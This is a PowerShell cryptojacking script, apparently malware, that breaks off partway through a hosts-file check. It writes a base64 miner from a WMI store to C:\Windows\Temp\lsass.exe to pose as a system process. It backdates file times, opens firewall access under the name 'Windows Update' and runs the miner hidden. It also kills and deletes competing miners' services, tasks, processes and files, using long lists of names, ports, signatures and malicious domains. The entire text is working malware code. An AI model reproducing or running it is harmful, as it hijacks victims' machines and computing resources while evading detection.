$ErrorActionPreference = 'SilentlyContinue' Set-Location "$Env:WinDir\System32" $Env:Path=$Env:Path+";$Env:WinDir;$Env:WinDir\System32" $FileName = "lsass.exe" $InstallDir = "C:\Windows\Temp" $InstallPath = "C:\Windows\Temp\lsass.exe" $WmiName_Miner = "YZZLFGYJMZ" $WmiName = "root\cimv2:PowerShell_Command" $mPId = ([WmiClass]$WmiName).Properties['mPId'].Value $nPId = ([WmiClass]$WmiName).Properties['nPId'].Value Write-Host "[i] FileName : $FileName" Write-Host "[i] InstallDir : $InstallDir" Write-Host "[i] InstallPath: $InstallPath" Function WMI_DeleteFile($PathArray) { foreach ($Path in $PathArray) { for ($i=0; $i -Lt 30; $i++) { Remove-Item $Path -Force -EA 0 if (Test-Path $Path) { Start-Sleep -Milliseconds 100 if ($i -Eq 29) { Move-Item $Path ($Path+'.tmp') -Force -EA 0 } } else { break } } $Temp = New-Item $Path -Type Directory -EA 0 if ($?) { $Temp.CreationTime = $Temp.LastWriteTime = $Temp.LastAccessTime = '07/14/2009 07:04:08' $Temp.Attributes = "Readonly","System","Hidden" } } } Function WMI_FileTime($DestPath, $SrcPath="$Env:WinDir\Explorer.exe") { $Time = '07/14/2009 07:31:13' $SrcFile = Get-Item $SrcPath -Force -EA 0 if ($SrcFile -Ne $Null) { $Time = $SrcFile.CreationTime } $DestFile = Get-Item $DestPath -Force -EA 0 $DestFile.CreationTime = $DestFile.LastWriteTime = $DestFile.LastAccessTime = $Time } Function WMI_CheckDiskSpace { $Result = $False $Test = Get-WmiObject -Class Win32_LogicalDisk | Where-Object {($_.DriveType -Eq 3) -And ($_.DeviceID -Eq $Env:SystemDrive) -And ($_.FreeSpace -Ge 1GB)} if ($Test -Ne $Null) { $Result = $True } return $Result } Function WMI_MakeBigFile($FilePath) { $MakeLength = 10MB if (WMI_CheckDiskSpace) { $MakeLength = 100MB } $FS = New-Object System.IO.FileStream($FilePath, [System.IO.FileMode]::OpenOrCreate, [System.IO.FileAccess]::ReadWrite) $Null = $FS.Seek($MakeLength, [System.IO.SeekOrigin]::Begin) $VerLength = 2990 for ($i=1; $i -Le $VerLength; $i++) { $FS.WriteByte((Get-Random -Min 0 -Max 255)) } if (!(Test-Path Variable:MinerBytes)) { $Miner = ([WmiClass]$WmiName).Properties[$WmiName_Miner].Value $MinerBytes = [System.Convert]::FromBase64String($Miner) } $Null = $FS.Seek(0, [System.IO.SeekOrigin]::Begin) $Length = $MinerBytes.Length $WriteLength = $FS.Write($MinerBytes, 0, $Length) $FS.Flush() $FS.Close() } Function WMI_StartMiner { $Null = TakeOwn.exe /F $InstallDir $Null = iCACLs.exe $InstallDir /Reset /T /C $Null = iCACLs.exe $InstallDir /Grant Everyone:F /T /C $Null = CACLs.exe $InstallPath /E /G Everyone:F /C if (!(Test-Path $InstallDir)){ New-Item $InstallDir -Type Directory } if (!((Get-Item $InstallPath -Force -EA 0) -is [IO.FileInfo])) { Remove-Item $InstallPath -Recurse -Force -EA 0 } WMI_MakeBigFile $InstallPath if (Test-Path $InstallPath) { $Null = NetSH Firewall Add AllowedProgram $InstallPath "Windows Update" Enable WMI_FileTime $InstallPath $Process = Start-Process -FilePath $InstallPath -WindowStyle Hidden -PassThru $ProcessId = $($Process.Id) if ($ProcessId -ne $NULL) { Write-Host "[+] New Process Id is $ProcessId" $Wmi=New-Object Management.ManagementClass($WmiName) $Wmi.SetPropertyValue('mPId',$ProcessId) $Null=$Wmi.Put() } else { Write-Host "[-] New Process Id is NULL" } } } Function WMI_Killer { $SrvName = "SxS","WinSvc","xWinWpdSrv","mssecsvc2.0","mssecsvc2.1","DbSecuritySpt","SVSHost","SVNSHost","Microsoft Telemetry","lsass","Microsoft","system","Oracleupdate","CLR","sysmgt","\gm","WmdnPnSN","Sougoudl","National","Nationaaal","Natimmonal","Nationaloll","Nationalmll","Nationalaie","Nationalwpi","WinHelp32","WinHelp64","Samserver","RpcEptManger","NetMsmqActiv Media NVIDIA","NetMsmqActiv NuGet NVIDIA","NetActiv NuGet NVIDIA","Sncryption Media Playeq","windows-nvidia-firewall","windows-nvidia-firewall1-nvidia","windows-nvidia-firewall1-nvidia12","YiluzhuanqianSer","svchost","WindwosUpdate","ClipBooks","NetUdpPortSharing","IPSECS","360rTys",".Net CLR","Netuser CLR","Windows Help System Myss","MessengerBengal","WinVaultSvc","Player","Windows Audio Control","WinHasdelp32","WinHasdadelp32","WissssssnHelp32","Xtfy","Xtfya","Xtfyxxx","windows dureall (RPC) Remote Down","Remote UProcedure all (RPC)","WindowseRemotes UProcedure Call (RPC)","Helper Remotes Procedure Call (RPC)","Remote DOWN windows dureall (RPC)","Piagnostics Hracking","Serhiez","SuperProServer","ALGM","Windows32_Update","wmiApSrvs","wmiApServs","NetTcpService","SvcNlauser","Windows Managers","Windows_Update","Microsoft MR","Windows.UserinSystem.Net CLR","IronPython Windows Console","IronPythoe Windows Atmelup","PronPythoe Windows Atmealup","PronPythoe Windows Atmealug","DNS Server","iis","Zational","Application Layre Gateway Service","CardsService","Services","clr_optimization_v3.0.50727_32","taskmgr1","win","WinServic","WiFiService","Alimama","AlipaySvcSec","Contenteplspcon","SRDSL","MpeSvc","WerSvc.NET","Windows.Net CLR","DocFilePropertray","WinTcpAutoProxySvc","WebServers","ExpressVNService",'WWW.DDOS.CN.COM','WinHelpSvcs','aspnet_staters','clr_optimization','AxInstSV' foreach ($Srv in $SrvName) { if ((Get-Service -Name $Srv -EA 0) -Eq $Null) { continue } $Test = Get-WmiObject -Class Win32_Service | Where-Object {$_.Name -Eq $Srv} if ($Test -Ne $Null) { $SrvPId = $($Test.ProcessId) $SrvName = $($Test.Name) $SrvPath = $($Test.PathName) Write-Host "[K] $SrvPId`t$SrvName`t$SrvPath" $Null = $Test.ChangeStartMode('Disabled') if ($SrvPId -Ne 0) { Get-Process -Id $SrvPId -EA 0 | Stop-Process -Force } $Null = $Test.StopService() $Null = $Test.Delete() } } $TaskName = "my1","Mysa","Mysa1","Mysa2","Mysa3","ok","Oracle Java","Oracle Java Update","Microsoft Telemetry","Spooler SubSystem Service","Oracle Products Reporter","Update service for products","gm","ngm","Sorry","Windows_Update","Update_windows","WindowsUpdate1","WindowsUpdate2","WindowsUpdate3","AdobeFlashPlayer","FlashPlayer1","FlashPlayer2","FlashPlayer3","IIS","WindowsLogTasks","System Log Security Check","Update","Update1","Update2","Update3","Update4","DNS","SYSTEM","DNS2","SYSTEMa","skycmd","Miscfost","Netframework","Flash","RavTask","GooglePinginConfigs","HomeGroupProvider","MiscfostNsi","WwANsvc","Bluetooths","Ddrivers","DnsScan","WebServers","Credentials","TablteInputout","werclpsyport","HispDemorn","LimeRAT-Admin","DnsCore","Update service for Windows Service","DnsCore","ECDnsCore","SystemFlushDns","Microsoft Assist Job","WindowsMonitor","blackball","WindowsSystemHelper","WindowsUpdateMonitor" foreach ($Task in $TaskName) { $Temp = '"'+$Task+'"' SchTasks.exe /Delete /TN $Temp /F 2> $Null } $CmdLine = Get-WmiObject -Class Win32_Process | Where-Object { ( $_.CommandLine -Like '*cryptonight*' ) -Or ( $_.CommandLine -Like '*stratum+*' ) -Or ( $_.CommandLine -Like '*-p x*' ) -Or ( $_.CommandLine -Like '*--donate-level*' ) -Or ( $_.CommandLine -Like '*--max-cpu-usage*' ) -Or ( $_.CommandLine -Like '*--keepalive*' ) -Or ( $_.CommandLine -Like '*--variant*' ) -Or ( $_.CommandLine -Like '*--nicehash*' ) -Or ( $_.CommandLine -Like '*pool.electroneum.hashvault.pro*' ) -Or ( $_.CommandLine -Like "* -c `"*\cfg*`"" ) -Or ( $_.CommandLine -Like "* Win7" ) -Or ( $_.CommandLine -Like "*ftp -s:*" ) -Or ( $_.CommandLine -Like "*\test\open.bat*" ) -Or ( $_.CommandLine -Like "*S]&cd&echo *" ) } if ($CmdLine -ne $Null) { $PathArray = @() foreach ($m in $CmdLine) { $Path = $($m.Path) $EvId = $($m.ProcessId) if (($EvId -eq $PId) -or ($EvId -eq $mPId) -Or ($Path -Eq $InstallPath)) { continue } Write-Host "[K] $EvId`t$Path" $Null = $m.Terminate() if (($Path -Eq "$Env:WinDir\System32\cmd.exe") -Or ($Path -Eq "$Env:WinDir\SysWOW64\cmd.exe") -Or ($Path -Eq "$Env:WinDir\Explorer.exe") -Or ($Path -Eq "$Env:WinDir\Notepad.exe") -Or ($Path -Eq "$Env:WinDir\System32\Notepad.exe") -Or ($Path -Eq "$Env:WinDir\System32\SvcHost.exe") -Or ($Path -Eq "$Env:WinDir\SysWOW64\SvcHost.exe") -Or ($Path -Eq "$Env:WinDir\System32\WUApp.exe") -Or ($Path -Eq "$Env:WinDir\SysWOW64\WUApp.exe")) { continue } if ($PathArray -NotContains $Path) { $PathArray+=$Path } } WMI_DeleteFile($PathArray) } [array]$psids = Get-Process -Name PowerShell | Sort CPU -Descending | ForEach-Object {$_.Id} $tcpconn = NetStat -anop TCP if ($psids -ne $null) { foreach ($t in $tcpconn) { $line = $t.split(' ')| ?{$_} if ($line -eq $null) { continue } if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":443 ") -or $t.contains(":1111") -or $t.contains(":2222") -or $t.contains(":3333") -or $t.contains(":4444") -or $t.contains(":5555") -or $t.contains(":6666") -or $t.contains(":7777") -or $t.contains(":8888") -or $t.contains(":9999") -or $t.contains(":13333") -or $t.contains(":14433") -or $t.contains(":14444") -or $t.contains(":45560") -Or $t.contains(":45700") -or $t.contains(":65333"))) { $evid = $line[-1] if (($evid -eq $PId) -or ($evid -eq $mPId) -or ($evid -eq $nPId)) { continue } Write-Host "[K] Miner PId: $evid" Get-Process -Id $evid -EA 0 | Stop-Process -Force } } } foreach ($t in $tcpconn) { $line = $t.split(' ')| ?{$_} if (!($line -is [array])) { continue } if (($line[-3] -ne $null) -and $t.contains("ESTABLISHED") -and ($line[-3].contains(":1111") -or $line[-3].contains(":2222") -or $line[-3].contains(":3333") -or $line[-3].contains(":4444") -or $line[-3].contains(":5555") -or $line[-3].contains(":6666") -or $line[-3].contains(":7777") -or $line[-3].contains(":8888") -or $line[-3].contains(":9999") -or $line[-3].contains(":13333") -or $line[-3].contains(":14433") -or $line[-3].contains(":14444") -or $line[-3].contains(":45560") -Or $line[-3].contains(":45700") -or $line[-3].contains(":65333") -or $line[-3].contains(":55335") -Or $line[-3].contains(":10001") -Or $line[-3].contains(":13531"))) { $evid = $line[-1] if (($evid -eq $PId) -or ($evid -eq $mPId) -or ($evid -eq $nPId)) { continue } Write-Host "[K] Miner PId: $evid" Get-Process -Id $evid -EA 0 | Stop-Process -Force } } $Miner = "SC","WerMgr","WerFault","DW20","msinfo","XMR*","xmrig*","minerd","*Miner*","MinerGate","Carbon","yamm1","upgeade","auto-upgeade",'svshost',"svnshost","SystemIIS","SystemIISSec","avast*",'WindowsUpdater*',"WindowsDefender*","WindowsService*","Windows","update","carss","service","csrsc","cara","javaupd","gxdrv","lsmose","lsmosee","secuams","SQLEXPRESS_X64_86","Calligrap","Sqlceqp","Setting","Uninsta","Setring","Galligrp","Imaging","taskegr","Terms","Terms.EXE","360","8866","9966","9696","9797","svchosti","SearchIndex","Avira","cohernece","win","SQLforwin","xig*","taskmgr1","Workstation","ress","explores","zs" foreach ($m in $Miner) { Get-Process -Name $m -EA 0 | Stop-Process -Force } } Function WMI_KillFake { $WinDir = "$Env:WinDir\" $SysDir = "$Env:WinDir\System32\" $WowDir = "$Env:WinDir\SysWOW64\" $CmdLine = Get-WmiObject -Class Win32_Process | Where-Object { ($_.Path -Ne $Null) -And ( ( $_.Name -Eq "ctfmon.exe" -And $_.Path -Ne $SysDir+"ctfmon.exe" -And $_.Path -Ne $WowDir+"ctfmon.exe" ) -Or ( $_.Name -Eq "DllHost.exe" -And $_.Path -Ne $SysDir+"DllHost.exe" -And $_.Path -Ne $WowDir+"DllHost.exe" ) -Or ( $_.Name -Eq "SvcHost.exe" -And $_.Path -Ne $SysDir+"SvcHost.exe" -And $_.Path -Ne $WowDir+"SvcHost.exe" ) -Or ( $_.Name -Eq "TaskMgr.exe" -And $_.Path -Ne $SysDir+"TaskMgr.exe" -And $_.Path -Ne $WowDir+"TaskMgr.exe" ) -Or ( $_.Name -Eq "w3wp.exe" -And $_.Path -Ne $SysDir+"inetsrv\w3wp.exe" -And $_.Path -Ne $WowDir+"inetsrv\w3wp.exe" ) -Or ( $_.Name -Eq "WmiPrvSE.exe" -And $_.Path -Ne $SysDir+"Wbem\WmiPrvSE.exe" -And $_.Path -Ne $WowDir+"Wbem\WmiPrvSE.exe" ) -Or ( $_.Name -Eq "smss.exe" -And $_.Path -Ne $SysDir+"smss.exe" ) -Or ( $_.Name -Eq "csrss.exe" -And $_.Path -Ne $SysDir+"csrss.exe" ) -Or ( $_.Name -Eq "Lsass.exe" -And $_.Path -Ne $SysDir+"Lsass.exe" ) -Or ( $_.Name -Eq "WinLogon.exe" -And $_.Path -Ne $SysDir+"WinLogon.exe" ) -Or ( $_.Name -Eq "Services.exe" -And $_.Path -Ne $SysDir+"Services.exe" ) -Or ( $_.Name -Eq "Spoolsv.exe" -And $_.Path -Ne $SysDir+"Spoolsv.exe" ) -Or ( $_.Name -Eq "TaskHost.exe" -And $_.Path -Ne $SysDir+"TaskHost.exe" ) -Or ( $_.Name -Eq "ConIME.exe" -And $_.Path -Ne $SysDir+"ConIME.exe" ) -Or ( $_.Name -Eq "ConHost.exe" -And $_.Path -Ne $SysDir+"ConHost.exe" ) -Or ( $_.Name -Eq "RdpClip.exe" -And $_.Path -Ne $SysDir+"RdpClip.exe" ) -Or ( $_.Name -Eq "Explorer.exe" -And $_.Path -Ne $WinDir+"Explorer.exe" ) -Or ( $_.Name -Eq "ChsIME.exe" -And $_.Path -Ne $SysDir+"InputMethod\CHS\ChsIME.exe" ) -Or ( $_.Name -Eq "msdtc.exe" -And $_.Path -Ne $SysDir+"msdtc.exe" ) -Or ( $_.Name -Like "*.bat" ) -Or ( $_.Name -Like "*.pif" ) -Or ( $_.Name -Like "*.com" ) -Or ( $_.Name -Like "*.ini" ) -Or ( $_.Name -Like "*.html" ) -Or ( $_.Path -Like "*HashFish*" ) -Or ( $_.Path -Like "*\WebDAV\*" ) -Or ( $_.Path -Like "*:\Inetpub\*" ) -Or ( $_.Path -Like "*:\PerfLogs\*" ) -Or ( $_.Path -Like "*:\$Recycle.Bin\*" ) -Or ( $_.Path -Like "*:\Users\Public\*" ) -Or ( ( $_.Path -Like "*:\Users\*\AppData\Roaming\*" ) -And ( ( $_.Path -NotMatch "360se" ) -And ( $_.Path -NotMatch "baidu" ) ) ) -Or ( $_.Path -Like "$Env:WinDir\IME\*" ) -Or ( $_.Path -Like "$Env:WinDir\Web\*" ) -Or ( $_.Path -Like "$Env:WinDir\Help\*" ) -Or ( $_.Path -Like "$Env:WinDir\Temp\*" ) -Or ( $_.Path -Like "$Env:WinDir\Tasks\*" ) -Or ( $_.Path -Like "$Env:WinDir\Debug\*" ) -Or ( $_.Path -Like "$Env:WinDir\Fonts\*" ) -Or ( $_.Path -Like "$Env:WinDir\Media\*" ) -Or ( $_.Path -Like "$Env:WinDir\Config\*" ) -Or ( $_.Path -Like "$Env:WinDir\Cursors\*" ) -Or ( $_.Path -Like "$Env:WinDir\System\*" ) -Or ( $_.Path -Like "$Env:WinDir\Systems\*" ) -Or ( $_.Path -Like "$Env:WinDir\Security\*" ) -Or ( $_.Path -Like "$Env:WinDir\Resources\*" ) -Or ( $_.Path -Like "$Env:WinDir\CSS\*" ) -Or ( $_.Path -Like "$Env:WinDir\IIS\*" ) -Or ( $_.Path -Like "$Env:WinDir\dispmrroe\*" ) -Or ( $_.Path -Like "$Env:WinDir\miagration\*" ) -Or ( $_.Path -Like "$Env:WinDir\InfusedAppe\*" ) -Or ( $_.Path -Like "C:\WebKitsSDK\*" ) -Or ( $_.Path -Like "$Env:WinDir\WindowsUpdata\*" ) -Or ( $_.Path -Like "$Env:WinDir\WindowsUpdate\*" ) -Or ( $_.Path -Like "$Env:WinDir\AppDiagnostics\*" ) -Or ( $_.Path -Like "$Env:WinDir\NetworkDistribution\*" ) -Or ( $_.Path -Like "$Env:WinDir\System32\Config\*" ) -Or ( $_.Path -Like "$Env:WinDir\SysWOW64\Config\*" ) -Or ( $_.Path -Like "*%ProgramFiles%\*" ) -Or ( $_.Path -Like "*:\Program Files\Microsoft *" ) -Or ( $_.Path -Like "*:\Program Files (x86)\Microsoft *" ) -Or ( $_.Path -Like "*:\Program Files (x86)\NetMeeting\*" ) -Or ( $_.Path -Like "*:\Program Files (x86)\Windows Photo\*" ) -Or ( $_.Path -Like "*:\Program Files (x86)\Windows Explorer\*" ) -Or ( (( $_.Path -Like "*:\Program Files\Windows NT\*" ) -Or ( $_.Path -Like "*:\Program Files (x86)\Windows NT\*" )) -And ($_.Name -Ne "wordpad.exe")) ) -Or ( ( $_.Path -Like "*:\Program Files\Linux*" ) -Or ( $_.Path -Like "*:\Program Files (x86)\Linux*" ) ) -Or ( $_.Path -Like "$Env:WinDir\php.exe" ) -Or ( $_.Path -Like "$Env:WinDir\test.exe" ) -Or ( $_.Path -Like "$Env:WinDir\Terms*" ) -Or ( $_.Path -Like "$Env:WinDir\Ru*.exe" ) -Or ( $_.Path -Like "*\winvhost.exe" ) -Or ( ( $_.Path -Like "*:\ProgramData\*" ) -And ( ( $_.Path -NotMatch "aliyun" ) -And ( $_.Path -NotMatch "Windows Defender" ) -And ( $_.Path -NotMatch "Oracle" ) -And ( $_.Path -NotMatch "Java" ) ) ) -Or ( $_.Path -Match ":\\Program Files\\\w*\.exe" ) -Or ( $_.Path -Match ":\\Program Files \(x86\)\\\w*\.exe" ) -Or ( $_.Path -Like "*:\Users\*\AppData\Local\Temp\*" ) -Or ( $_.Path -Like "*:\Documents and Settings\*\Local Settings\Temp\*" ) -Or ( $_.Path -Like "*:\Docume~1\*\Locals~1\Temp\*" ) -Or ( $_.Path -Like "*:\Users\*$\*" ) } if ($CmdLine -Ne $Null) { $PathArray = @() foreach ($m in $CmdLine) { $Path = $($m.Path) $EvId = $($m.ProcessId) if (($EvId -Eq $PId) -Or ($EvId -Eq $mPId) -Or ($Path -Eq $InstallPath)) { continue } if ($Path -Match "Microsoft") { $VerInfo = Get-Item $Path -Force -EA 0 | Select-Object -ExpandProperty VersionInfo if (($VerInfo.CompanyName -Eq "Microsoft Corporation") -And ($VerInfo.CompanyName -Ne "NVIDIA Corporation") -And ($VerInfo.FileDescription -NotMatch "Kinco") -And ($VerInfo.InternalName -Ne "WerFault")) { continue } } Write-Host "[K] $EvId`t$Path" $Null = $m.Terminate() if ($PathArray -NotContains $Path) { $PathArray+=$Path } } WMI_DeleteFile($PathArray) } } Function IsWhiteSrv($SrvName) { $Result = $False $WhiteListArray = 'MpsSvc','Microsoft Office Groove Audit Service','Microsoft SharePoint Workspace Audit Service','SQL Server Distributed Replay Client','SQL Server Distributed Replay Controller','FileZilla Server','Wing FTP Server','Cerberus FTP Server','SolarWinds TFTP Server','EasyFZS Server','VMware NAT Service','VMware Physical Disk Helper Service','Safedog Update Center','Alibaba Security Aegis Detect Service','Alibaba Security Aegis Update Service','Agent Update','QEMU Guest Agent Check','QEMU Guest Agent VSS Provider','Net Driver HPZ12','Pml Driver HPZ12','HP LaserJet Service','HP Port Resolver','HP Status Server','HP Health Check Service','HP Support Assistant Service','MyEpson Portal Service','AMD External Events Utility','AMD FUEL Service','Intel(R) PROSet Monitoring Service','Intel(R) Capability Licensing Service Interface','Intel(R) Capability Licensing Service TCP IP Interface','Intel(R) TPM Provisioning Service','Intel(R) SUR QC SAM','Bluetooth Device Monitor','Bluetooth Media Service','Bluetooth OBEX Service','Intel Unite Guest Access Service','Intel(R) Security Assist','Intel(R) ME Service','Stereo Service','memcached Server','Oracle VM Service','HP Application Lifecycle Management','iPod Service','Apple Mobile Device','Apple Mobile Device Service','Samsung UPD Service','Samsung Update Plus','WebCTRL 4 Service','SSWeb 3.0 Service','SSWeb 4 Service','avast! Antivirus','avast! Firewall','F-Secure Network Request Broker','F-Secure WebUI Daemon','Core Mail Protection','Core Scanning Server','Core Scanning ServerEx','Online Protection System','Quick Update Service','V3 Service','V3 Clinic Service','Sophos Agent','Sophos Clean Service','Sophos Health Service','Sophos MCS Agent','Sophos MCS Client','Sophos Safestore Service','Sophos File Scanner Service','Sophos AutoUpdate Service','Sophos Web Control Service','Sophos Device Control Service','McAfee SiteAdvisor Enterprise Service','Zabbix Agent','Synology Drive VSS Service x64','Cloud Station Drive VSS Service','Ksyun Agent','Ksyun Update','Symantec AntiVirus','Platinum Host Service','CloudBerry Backup Service','ZoneAlarm ICM Service','Parallels Tools Service','FlexNet Licensing Service','NetOp Host for NT Service','Steam Client Service','EaseUS Agent','Sense Shield Service' foreach ($WhiteList in $WhiteListArray) { if ($WhiteList -Eq $SrvName) { $Result = $True break } } return $Result } Function WMI_KillService { $SrvArray = Get-WmiObject -Class Win32_Service | Where-Object { ( $_.Name -Ne $Null ) -And ( ( $_.Name -Match "^\d+$" ) -Or ( $_.Name -Match "^Nati\w+" ) -Or ( $_.Name -Match "^Wati\w+" ) -Or ( $_.Name -Match "^Mpe\w+" ) -Or ( $_.Name -Match "^Mps\w+" ) -Or ( $_.Name -Match ".*\.Net CLR.*" ) -Or ( $_.Name -Match "^WOW.*" ) -Or ( $_.Name -Match ".*WOW.*" ) -Or ( $_.Name -Match ".*WinTcpAutoProxy.*" ) -Or ( ( $_.DisplayName -Eq "Microsoft Software "+$_.Name ) -Or ( $_.DisplayName -Eq "ASP.NET State Services" ) ) -Or ( ( $_.Name -Match "\w+ \w+" ) -And ( ( $_.PathName -NotMatch "Alibaba" ) -And ( $_.PathName -NotMatch "JCloudHIDS" ) -And ( $_.PathName -NotMatch "SafeDog" ) -And ( $_.PathName -NotMatch "KsYunAgent" ) -And ( $_.PathName -NotMatch "CloudBerry" ) -And ( $_.PathName -NotMatch "Avast" ) -And ( $_.PathName -NotMatch "AhnLab" ) -And ( $_.PathName -NotMatch "F-Secure" ) -And ( $_.PathName -NotMatch "McAfee" ) -And ( $_.PathName -NotMatch "Quick Heal" ) -And ( $_.PathName -NotMatch "Sophos" ) -And ( $_.PathName -NotMatch "Seqrite" ) -And ( $_.PathName -NotMatch "Norton" ) -And ( $_.PathName -NotMatch "Symantec" ) -And ( $_.PathName -NotMatch "Trend Micro" ) -And ( $_.PathName -NotMatch "ZoneAlarm" ) -And ( $_.PathName -NotMatch "ColdFusion" ) -And ( $_.PathName -NotMatch "PDF Architect" ) -And ( $_.PathName -NotMatch "PostgreSQL" ) -And ( $_.PathName -NotMatch "Synology" ) -And ( $_.PathName -NotMatch "TongFang" ) -And ( $_.PathName -NotMatch "IBM" ) -And ( $_.PathName -NotMatch "Dell" ) -And ( $_.PathName -NotMatch "Lenovo" ) -And ( $_.PathName -NotMatch "ThinkPad" ) -And ( $_.PathName -NotMatch "Apple" ) -And ( $_.PathName -NotMatch "Intel" ) -And ( $_.PathName -NotMatch "ATI" ) -And ( $_.PathName -NotMatch "NVIDIA" ) -And ( $_.PathName -NotMatch "HP" ) -And ( $_.PathName -NotMatch "Canon" ) -And ( $_.PathName -NotMatch "EPSON" ) -And ( $_.PathName -NotMatch "Zabbix" ) -And ( $_.PathName -NotMatch "Seagate" ) -And ( $_.PathName -NotMatch "Parallels" ) -And ( $_.PathName -NotMatch "SenseShield" ) ) ) ) } if ($SrvArray -Ne $Null) { $PathArray = @() foreach ($Srv in $SrvArray) { $SrvPId = $($Srv.ProcessId) $SrvName = $($Srv.Name) $SrvPath = $($Srv.PathName) if (IsWhiteSrv($SrvName)) { continue } Write-Host "[K] $SrvPId`t$SrvName`t$SrvPath" if ($SrvPId -Ne 0) { Get-Process -Id $SrvPId -EA 0 | Stop-Process -Force } if (($SrvPath -Like "$Env:WinDir\System32\SvcHost.exe*") -Or ($SrvPath -Like "$Env:WinDir\SysWOW64\SvcHost.exe*")) { } else { if ($PathArray -NotContains $SrvPath) { $PathArray+=$SrvPath } } $Null = $Srv.ChangeStartMode('Disabled') $Null = $Srv.StopService() $Null = $Srv.Delete() } WMI_DeleteFile($PathArray) } $SrvArray = Get-WmiObject -Class Win32_Service | Where-Object { ( $_.Name -Ne $Null ) -And ( ( $_.Name -Eq $_.DisplayName ) -Or ( $_.Name -Eq "COM+ Event Systems" ) ) -And ( $_.PathName -Match $_.Name ) } if ($SrvArray -Ne $Null) { foreach ($Srv in $SrvArray) { $SrvPId = $($Srv.ProcessId) $SrvName = $($Srv.Name) $SrvPath = $($Srv.PathName) if (($SrvName -Eq "WebClient") -Or ($SrvName -Eq "XLNXService") -Or ($SrvName -Eq "XLServicePlatform") -Or ($SrvName -Eq "QQLiveService") -Or ($SrvName -Eq "TmSvc")) { continue } if (($SrvPath -NotMatch " -k $SrvName$") -And ($SrvPath -NotMatch " -k `"$SrvName`"$")) { continue } Write-Host "[K] $SrvPId`t$SrvName`t$SrvPath" if ($SrvPId -Ne 0) { Get-Process -Id $SrvPId -EA 0 | Stop-Process -Force } $Null = $Srv.ChangeStartMode('Disabled') $Null = $Srv.StopService() $Null = $Srv.Delete() } } $SrvArray = Get-WmiObject -Class Win32_Service | Where-Object { (( $_.Name -Eq "FastUserSwitchingCompatibility" ) -Or ( $_.Name -Eq "Ias" ) -Or ( $_.Name -Eq "Irmon" ) -Or ( $_.Name -Eq "Nla" ) -Or ( $_.Name -Eq "Ntmssvc" ) -Or ( $_.Name -Eq "Wmi" )) -And ($_.DisplayName.Length -Eq 8) } if ($SrvArray -Ne $Null) { foreach ($Srv in $SrvArray) { $SrvPId = $($Srv.ProcessId) $SrvName = $($Srv.Name) $SrvPath = $($Srv.PathName) if ($SrvPath -NotMatch " -k netsvcs") { continue } Write-Host "[K] $SrvPId`t$SrvName`t$SrvPath" if ($SrvPId -Ne 0) { Get-Process -Id $SrvPId -EA 0 | Stop-Process -Force } $Null = $Srv.ChangeStartMode('Disabled') $Null = $Srv.StopService() $Null = $Srv.Delete() } } } Function WMI_Scanner() { $PS = Get-WmiObject -Class Win32_Process if ($PS -ne $Null) { $PathArray = @() $Flags = "XMRig","\x00\x58\x00\x4D\x00\x52\x00\x69\x00\x67","stratum+tcp://","cryptonight","nicehash","\u940f\u626e\u553a\u942d\u5938\u7b1f","\u65e5\u4f60\u5988","UPX!","AdobeART","hra%u.dll","FuckShieldRefreshMutex","%c%c%c%c%c.exe","g1fd","ddos.tf","win%ca%cb%cd.exe","luoxkexp.com","xmrtor","BWebCam.dll","MakeSureDirectoryPathExists",".vmp0","hognoob.se",".aspack" foreach ($m in $PS) { $Path = $($m.Path) $EvId = $($m.ProcessId) if (($Path -eq $Null) -Or ($EvId -eq $PId) -Or ($EvId -eq $mPId)) { continue } $Bin = Get-Content -Path $Path -ReadCount 0 -Force -EA 0 if ($Bin -eq $Null) { continue } foreach ($Key in $Flags) { if ($Bin -Match $Key) { if (($Key -Eq "UPX!") -Or ($Key -Eq ".aspack")) { if (($Path -NotLike "$Env:WinDir\*") -And ($Path -NotLike "*:\Program Files (x86)\360*")) { continue } } elseif ($Key -Eq "MakeSureDirectoryPathExists") { $VerInfo = Get-Item $Path -Force -EA 0 | Select-Object -ExpandProperty VersionInfo if ($Path -Match "QCloud") { continue } if (($VerInfo.CompanyName -Ne "") -And ($VerInfo.CompanyName -Ne $Null) -And ($VerInfo.FileDescription -NotLike "*StuDormMS*")) { continue } } Write-Host "[K] $EvId`t$Path`t$Key" $Null = $m.Terminate() if ($PathArray -NotContains $Path) { $PathArray+=$Path } break } } $Bin = $Null } WMI_DeleteFile($PathArray) } } Function WMI_CheckFile { $Test = Get-WmiObject -Class Win32_Process | Where-Object {($_.Name -eq $FileName) -And ($_.Path -eq $InstallPath)} if ($Test -Ne $Null) { $VerInfo = Get-Item $InstallPath -Force -EA 0 | Select-Object -ExpandProperty VersionInfo if ($VerInfo.FileDescription -Ne "Local Security Authority Process") { Write-Host "[-] Error File: $InstallPath" foreach ($t in $Test) { $ProcessId = $($t.ProcessId) Write-Host "[i] Error Process Id: $ProcessId" $Null = $t.Terminate() } for ($i=0; $i -lt 30; $i++) { Remove-Item $InstallPath -Force -EA 0 if (Test-Path $InstallPath) { Start-Sleep -Milliseconds 100 } else { break } } } else { $ProcessId = $($Test.ProcessId) if ($mPId -Ne $ProcessId) { $Global:mPId = $($Test.ProcessId) Write-Host "[*] Fix Process Id to $mPId" } } } } Function WMI_CheckHosts { $Hosts = "$Env:WinDir\System32\Drivers\etc\hosts" $Contents = Get-Content -Path $Hosts -ReadCount 0 -Force -EA 0 if (($Contents -Match "mineXMR") -Or ($Contents -Match "SupportXMR") -Or ($Contents -Match "NanoPool") -Or ($Contents -Match "F2Pool")) { $Temp = "" $Domain = "xmr.usa-138.com","pool.usa-138.com","aaaa.usa-138.com","wk.ctosus.ru","down.ctosus.ru","blog.ctoscn.ru","down.9ni.top","down.sxly518.xyz","gowel.top","m4.rui2.net","owwwa.com","a46.bulehero.in","a47.bulehero.in","a88.bulehero.in","a88.heroherohero.info","fid.hognoob.se","q1a.hognoob.se","upa1.hognoob.se","upa2.hognoob.se","pxi.hognoob.se","uio.hognoob.se","uio.heroherohero.info","wk.skjsl.com","wiu.fxxxxxxk.me","aic.fxxxxxxk.me","pxx.hognoob.se","cb.fuckingmy.life","aj.0x0x0x0x0.best","fky.dfg45dfg45.best","down.us-hack.ru","down.halloo.ru","pool.us-hack.ru","auth.to0ls.com","mail.to0ls.com","update.7h4uk.com","heronoob.eu","playapp12.com","185.193.125.38","mx.oops.best","mi.oops.best","ox.mygoodluck.best","fk.0xbdairolkoie.space","fk.0xbdairolkoie.website","fk.openyourass.icu","fk.openyourass.club" foreach ($d in $Domain) 